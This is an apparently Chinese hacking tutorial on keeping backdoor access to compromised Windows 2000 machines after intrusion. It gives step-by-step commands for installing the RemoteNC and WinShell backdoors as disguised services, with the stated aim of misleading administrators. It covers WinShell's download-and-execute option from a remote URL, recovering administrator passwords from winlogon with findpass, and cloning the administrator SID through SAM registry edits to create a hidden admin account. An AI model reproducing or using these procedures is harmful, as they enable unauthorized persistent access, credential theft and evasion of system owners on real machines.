有时辛苦找的肉鸡,没几天就让网管发现了,还补了漏洞,再也进不去了。常用留后门的工具有很多,我就说我常用的几种。
假设我们已经得到192.168.0.1的admin权限,user:hackpassword:123,并且192.168.0.1支持ipc$远程连接!(呵呵!废话!不能连接怎么作跳板!)在自己c:\hack下有remotenc,好,开始
c:\hack\remotenc192.168.0.1hack123runasuser"RemoteNC""ProvideLocalCMDRedirect"791888
解释:
remotenc目标主机用户名密码启动模式"
服务名称""
服务说明"监听的端口
控制密码/overwrite(注:可以不加该参数)
其中:
用户名必须是admin权限
启动模式有runasuser和localsystem两种(建议用runasuser模式,如果runasuser模式失败就用localsystem模式)
服务说明是启动后显示在
服务管理器中的说明,为了迷惑管理员,建议不要用“hack”之类
监听的端口是remotenc作为
服务启动以后开的监听端口,可以是7、8等,但不要是21、23、25、80等
控制密码:你telnet(或者ntshell)到监听端口后需要的密码,也就是你对remotenc的控制密码。(这里就不要要了哈!别这么小气三)
/overwrite覆盖已经安装的remotenc(不要覆盖我的哈)
回车后出现如下信息:
=======RemoteNCBeta4,WrittenbyAssassin2001=======
http://www.netXeyes.com
http://www.netXeyes.org
[InstallServiceasRunasUserMode]
Connecting192.160.0.1.....Done.
TransfferFile.....Done.
StartService.....Done.
也可能出现:
=======RemoteNCBeta4,WrittenbyAssassin2001=======
http://www.netXeyes.comhttp://www.netXeyes.org
[InstallServiceasRunasUserMode]
Connecting192.168.0.1.....Done.
TransfferFile.....Done.
StartService.....ServiceExsited,1206Failed.
这是启动服务失败
这是可以把安装模式换为localsystem,即
c:\hack\remotenc192.168.0.1hack123localsystem"RemoteNC""ProvideLocalCMDRedirect"791888
就能安装成功!
如果出现第一中情况,祝贺你,然后
MicrosoftTelnet>open192.168.0.17
正在连接到192.168.0.17...
然后出现:
RemoteNCControlPassword:(这里输入你的控制密码91888)
然后出现:
RemoteNCControlPassword:*********
MicrosoftWindows2000[セ5.00.2195]
RemoteNC>
哈哈,可以添加用户了!net命令就不用说了哈(即使hack123的账户被K了,仍然可以telnet到7在remotenc下添加用户,只要他不发现在服务管理器中的ProvideLocalCMDRedirect,你就一直都有自己的账户!)拷贝必要的文件上去!twwwscan等(注意隐蔽),或者fshttp,fspop也加上去,哈哈真的很爽!也可作成自己的sock5代理。
添加完用户,启动他的telnet服务如果没有启动的话),又可以继续运行你的twwwacan等东西了!
定制WinShell,看图:screen.width-333)this.width=screen.width-333"align=left>
============
运行winshell.exe,出现界面后进行配置,然后点击“Make”按钮即可生成满足自己要求的WinShell及其配置信息文件。主要配置项说明如下:
[Port]:
-------
[Password]:
-----------
登录winshell时候需要的密码,默认为无密码。
[PasswordBanner]:
------------------
当登录winshell时要求输入密码的提示信息,默认为“Password:”,可设置为空,即无提示信息。
[SvcName]:
----------
当winshell在NT系统中以服务方式运行时的服务名称,默认为“WinShell”。例如:微软的FTP服务的服务名为“msftpsvc”。
[RegKeyName]:
-------------
在win9x系统中安装winshell时,为了在系统启动后能自动运行,winshell写在注册表路径HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run处的字符串名,默认为“WinShell”,其值也为字符串类型,例如:“c:\windows\winshell.exe”。
[DisplayName]:
--------------
显示在NT服务列表中服务的名称,一般为英文,默认为“WindowsShellService”,例如:微软的FTP服务的显示名为“FTPPublishingService”。
[Description]:
--------------
显示在NT服务列表中说明服务具体功能的字符串,默认为“ProvideWindowsShellService”,例如:微软的FTP服务的服务描述信息为“通过Internet信息服务的管理单元提供FTP连接和管理”,需要说明的是该项在NT4.0中不支持,在2000和XP中才有效。
[AutoInstall]:
--------------
选择当winshell运行的时候是否自动安装自己。
[DownExec]:
-----------
选择当winshell运行的时候是否自动下载可执行文件并运行。
[UrlAddress]:
-------------
被自动下载的可执行文件的Url地址。例如:http://www.abc.com/svr.exe。
[DestinationFilename]:
-----------------------
可执行文件被下载后存放的文件名,可包括全路径。例如:c:\svr.exe。
[CompressWinShellServer]:
--------------------------
默认状态下,定制winshell的主程序会为你生成一个压缩过的体积很小的WinShell服务端,当然你也可以不选择,而使用其它压缩或保护程序对生成的WinShell服务端进行处理。命令行方式
==========
WINSHELL.EXE[n][i][?]
n-port
运行与终止
==========
[运行WinShell]:
WinShell有两种运行方式,一种是应用程序方式,可在所有x86架构的windows平台上运行,直接执行Winshell.exe即可,当然也可带命令行参数;另一种就是NT的服务方式,只能在NT/2k/XP平台上运行,需要通过重新启动系统或执行“netstartwinshell”来启动。
[终止WinShell]:
有两种方法来终止winshell,一种是登录winshell成功后,使用内置的终止命令;另外一种方法是通过外部方法终止winshell的进程,对于以应用程序方式运行的winshell可通过查找进程列表并结束winshell的进程来完成,对于以服务方式运行的winshell,可通过“netstopwinshell”来完成。
登录WinShell
============
执行telnetxxx.xxx.xxx.xxx5277,输入正确的密码(若需要的话)后即登录成功,可看到以下信息:
?forhelp
iInstall(远程安装功能,当你仅仅执行winshel而没有安装winshell的时候)
rRemove(远程反安装功能,注意此命令并不终止winshell的运行)
pPath(查看winshell主程序的路径信息)
breBoot(重新启动机器)
dshutDown(关闭机器)
sShell(执行后你就会看到可爱的“C:\>”,这正是winshell提供的telnet服务功能)
xeXit(退出本次登录会话,注意此命令并不终止winshell的运行)
qQuit(终止WinShell的运行,注意此命令并不反安装WinShell)
Download:
CMD>http://.../srv.exe(通过http下载其他网站上的文件到运行winshell的机器上)
举例:
-----
1.CMD>p
C:\winnt\winshell.exe
2.CMD>http://www.janker.org/hello.exe
DownloadtoC:\winnt\hello.exe...
OK!
3.CMD>s
MicrosoftWindows2000[Version5.00.2195]
(C)Copyright1985-2000MicrosoftCorp.
C:\WINNT\>
如果你能够3389登陆的话,可试一下用findpass和pulist获得管理员密码。findpass的用法是:
findpassDomainNameUserNamePID-of-WinLogon
对于第一和第二个参数:可以执行SET命令查看USERDOMAIN=......;username=......当然直接用pulist看也可以。第三个参数PID:执行pulist.exe查找process名为winlogon的记住它后面的数字!像这样:
winlogon.exe164NTAUTHORITY\SYSTEM
还是先看张pulist的图:screen.width-333)this.width=screen.width-333">
找到各项参数后,然后用findpass找到密码:看图screen.width-333)this.width=screen.width-333">
第四:克隆帐号
首先要让大家知道的概念是在Windows2000和WindowsNT里,默认管理员帐号的SID是固定的500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下的方法,只不过这个用户较常见罢了),测试环境为Windows2000Server。
1.最麻烦的方法是在命令行下克隆:
运行一个System的CMDShell(lcx在这儿给你做好了一个运行system的cmd脚本,点这儿一分钟后运systemcmd,可以用下载软件下载这个system.vbe.在dos下是这样用cscript路径\system.vbe)或使用Http://www.sometips.com/soft/psu.exe这个软件也可以得到system的cmdshell),然后在该CMDShell里面运行regedit/eadam.regHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
这样我们将SID为500的管理员帐号的相关信息导出,然后编辑adam.reg文件,将adam.reg文件的第三行--[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最后的"1F4"修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安装的时候没有安装IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),将Root.reg文件中的"1F4"修改为"3E9"后执行
regedit/sadam.reg
导入该Reg文件
然后运行
netuserIUSR_MachineNamepassword
修改IUSR_MachineName的密码(最好使用14位的密码,越像IUSR_MachineName的密码越好)
这样,我们拥有和默认管理员一样的桌面、一样的Profile.....
而且,当我们运行netlocalgroupadministrators时,看看结果:
C:\>netlocalgroupadministrators
Aliasnameadministrators
CommentAdministratorshavecompleteandunrestrictedaccesstothecomputer/domain
-------------------------------------------------------------------------------
Administrator
Thecommandcompletedsuccessfully.
再看看USER2SID的输出结果:
C:\>user2sidAdministrator
Numberofsubauthoritiesis5
DomainisIDONTKNOW
LengthofSIDinmemoryis28bytes
TypeofSIDisSidTypeUser
Numberofsubauthoritiesis5
DomainisIDONTKNOW
LengthofSIDinmemoryis28bytes
TypeofSIDisSidTypeUser
很多人提到使用了管理工具的用户管理后,能够发现IUSR_MachineName被提升了权限。
现给出解决办法。
方法同上,不过这次修改内容多一些。即
这次要导出两个key内容:
一个是adam提到的
regedit/eadam.regHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
然后另外一个是你需要修改那个账号的值
然后按照adam提到的修改adam.reg
“将adam.reg文件的第三行--[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最后的"1F4"修改为IUSR_MachineName的SID”
现在,你还要从iusr.reg文件中复制一下内容
就是将iusr.reg文件中“"V"=hex:0”开始一直到iusr.reg文件结束部分复制下来
然后替换掉adam.reg中同样位置的部分
最后使用
regedit/sadam.reg
导入该Reg文件
呵呵,别忘了给这个IUSR_MachineName改密码哦。
hehe,ok,大功告成。
现在IUSR_MachineName账号拥有了管理员的权限,但是你使用net.exe和
管理工具中的用户管理都将看不到任何痕迹,即使你去察看所属于的组和用户。
都和修改前没有任何区别。
:http://www.heibai.net/download/show.php?id=2360
C:\>ca\\192.168.0.1testtestiusr_victimpassword
CloneAdministrator,bynetXeyes2002/04/06
WrittenbynetXeyes2002,dansnow@21cn.com
Connect192.168.0.1....OK
GetSIDofiusr_victim....OK
Prepairing....OK
Processing....OK
CleanUp....OK
用CCA.EXE检查是否存在克隆的帐号。
不必改变ACL,支持远程检查。
C:\>cca\\192.168.0.29administrator123456
CheckCloneAccount,bynetXeyes2002/04/29
WrittenbynetXeyes2002,dansnow@21cn.com
Connect192.168.0.29....OK
Prepairing....OK
Processing....OK
Checking....
[DuDu]ASSAMEAS[administrator]
[Guest]ASSAMEAS[administrator]
[IUSR_RONG]ASSAMEAS[administrator]
[IWAM_RONG]ASSAMEAS[administrator]
[TEST]ASSAMEAS[administrator]
[xr]ASSAMEAS[administrator]
[Guest]ASSAMEAS[DuDu]
[IUSR_RONG]ASSAMEAS[DuDu]
这上面的DuDu,guest,IUSR_RONG等帐户就已经是被克隆为administrator啦
3.另一种方法,登陆3389肉鸡,随心所欲克隆.上这个网站http://fo.18.to/下载动画教程吧,我就不写了.
运行regedt32
找到"HKEY_LOCAL_MACHINE"窗口,选中SAM\SAM,然后设置权置把administrator设为完全控制,
再次运行regedit
这时可以看到"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\User\000001F5"和"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\guest"
SAM\SAM的admin的权根是空,属性是:写入DAC和读取控制
应用到是:读取及其子项。
当前位置:
